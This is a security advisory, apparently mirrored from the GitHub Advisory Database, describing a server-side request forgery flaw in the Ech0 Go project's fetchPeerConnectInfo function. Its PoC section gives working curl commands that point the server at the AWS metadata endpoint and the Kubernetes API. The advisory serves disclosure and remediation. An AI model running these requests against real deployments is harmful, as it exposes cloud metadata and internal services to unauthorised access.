highCVSS 7.7Vulnerability

GHSA-8mc6-xjpr-h98x

## Summary The `fetchPeerConnectInfo` function in `internal/service/connect/connect.go:214-239` uses `httpUtil.SendRequest` (no SSRF protection) instead of `SendSafeRequest` (which has `ValidatePublicHTTPURL` with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints. ## Details In `internal/service/connect/connect.go`, the `fetchPeerConnectInfo` function: ```go func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) { url := httpUtil.TrimURL(peerConnectURL) + "/api/connect" resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout) ``` This uses `SendRequest` which has NO URL validation. The codebase HAS `SendSafeRequest` at `internal/util/http/http.go:228-281` with proper SSRF protection, but `fetchPeerConnectInfo` does not use it. Called from: - Line 307: `data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)` - - Line 498: `data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)` ## PoC ```bash # 1. Add a connection pointing to AWS metadata service curl -X POST "https://ech0.example.com/api/connects" \ -H "Authorization: Bearer <token>" \ -d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}' # 2. Trigger SSRF via health check curl -H "Authorization: Bearer <token>" \ "https://ech0.example.com/api/connects/health" # Returns AWS EC2 instance ID ``` Or for Kubernetes: ```bash curl -X POST "https://ech0.example.com/api/connects" \ -H "Authorization: Bearer <token>" \ -d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}' ``` ## Impact - **Confidentiality**: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API - - **CWE-918**: Server-Side Request Forgery

Properties

ghsa_id
GHSA-8mc6-xjpr-h98x
severity
high
summary
Ech0 has Server-Side Request Forgery (SSRF) via Connect Handler fetchPeerConnectInfo
cvss_score
7.7
cve_id
GHSA-8mc6-xjpr-h98x
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
is_ghsa_only
true
ghsa_published
2026-05-07T21:28:40Z
source_url
https://github.com/advisories/GHSA-8mc6-xjpr-h98x
ghsa_updated
2026-05-07T21:28:42Z

Related Entities (4)

AFFECTS (1)

[Software]go/github.com/lin-snow/Ech0

VULNERABLE_TO (1)

[Software]go/github.com/lin-snow/Ech0

HAS_WEAKNESS (1)

[Weakness]Server-Side Request Forgery (SSRF)

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph